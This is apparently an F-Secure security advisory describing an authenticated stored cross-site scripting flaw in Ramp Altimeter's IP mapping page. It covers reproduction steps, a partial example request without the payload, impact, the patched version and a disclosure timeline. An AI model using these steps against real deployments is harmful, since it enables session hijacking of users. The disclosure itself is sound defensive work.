Ramp Altimeter (https://ramp.com/altitudecdn/altimeter) is a web management interface for enterprise content delivery networks. It provides a GUI for administering Ramp Multicast+ and OmniCache instances, solutions used for efficient live video streaming.
The vulnerable functionality requires authentication, and is present at http://[HOSTNAME]/vdms/ipmapping.jsp. It can be accessed by clicking the “Create…” button, and in the dialog box that appears, a malicious payload can be inserted into the “Location” field. The payload is then stored by clicking “Save” at the bottom of the dialog box.
Below is an example request that stored a malicious payload on the server:
POST /vdms/rest/services/datastore/createOrEditValueForKey?key=[REDACTED] HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept-Encoding: gzip, deflate
Authorization: Basic [REDACTED]
The payload is then triggered by visiting http://[HOSTNAME]/vdms/ipmapping.jsp.
As Altimeter is typically deployed within an organization's internal network, this issue can aid an attacker who has gained a foothold in moving laterally within the the network and disrupting business operations. In particular, an attacker can use the vulnerability to target the browsers of application users. Additionally, they can gain control of the authenticated session of users who request the affected page, and can perform unauthorized actions within the application.
In order to address the above issue, it is recommended to update to the following version of the Altimeter software, which contains a fix for the vulnerability:
AltitudeCDN Altimeter v2.4.0
Additionally, strong credentials should be used for accounts within the application, and organizations should consider only allowing access to the management interface from a white-listed set of IP addresses.
Vulnerability discovered by Rob Russell
|2019-07-29||F-Secure informs the vendor of the issue in Altimeter 2.1.0|
|2019-07-30||Vendor confirms the vulnerability is still present in Altimeter 2.3.1|
|2019-07-30||F-Secure informs the vendor of intention to publish an advisory and asks for an estimated patch date|
|2019-07-30||Vendor informs F-Secure they plan to patch in version 2.4.0 with an ETA of late September|
|2019-09-18||F-Secure requests status update|
|2019-09-18||Vendor informs F-Secure that the patch is scheduled to be released Q1 2020|
|2020-01-13||F-Secure requests status update and sends draft of advisory to vendor|
|2020-02-10||Vendor confirms that the vulnerability is patched in version 2.4.0 and approves advisory|